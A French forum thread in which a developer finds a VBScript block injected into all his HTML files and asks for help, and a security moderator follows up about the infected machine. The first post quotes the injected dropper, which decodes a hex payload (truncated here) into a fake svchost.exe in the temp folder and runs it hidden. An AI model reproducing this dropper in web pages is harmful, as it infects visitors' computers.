Injection "Script VB" dans mes sources

guillaume_74 Messages postés 116 Statut Membre -  
Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité -
Bonjour,



Bonjour, je suis développeur dans une société, et là, je viens de m'apercevoir que mon poste est "infecté"... la cause !? Aucune idée... je ne vois pas... (pas vu de processus à proprement "suspect" mais bon... il y en a tellement que je n'ai peut être pas fait attention.
Donc, je vous explique, lors de l'appel d'un script php (qui inclut un script html)... tous les fichiers HTML se trouvant dans un répertoire "HTML" se trouve être infecté:
"
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

"
la ligne WriteData = "..." contient une séquence en Hexa particulièrement longue (probablement un exécutable en héxa)
Bref, j'ai ça dans tous mes scripts html ... (même dans les backups)
Si quelqu'un connait ça... on pourrait m'aider !?

merci beaucoup!
A voir également:

24 réponses

Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité 24 688
 
ça roule :)

Ton malware n'a pas l'air de modifier les fichiers HTML.
Donc si c'est un malware qui a fait cela, c'est autre chose (t'as pas répondu si le code est partagé avec d'autres PC ou si simplement accessible du tiens).

En tout cas, ta machine est infectée.
0
guillaume_74 Messages postés 116 Statut Membre 22
 
Déjà... Après mes premiers essais, le problème semble résolu ;)

Merci
0
guillaume_74 Messages postés 116 Statut Membre 22
 
Enfait... le problème se reproduit à nouveau...
0
Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité 24 688
 
OK mais là j'attends le rapport GMER.
Ensuite t'as pas répond sur le partage ou non des sources du site...
0
Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité 24 688
 
Encore vivant ?
0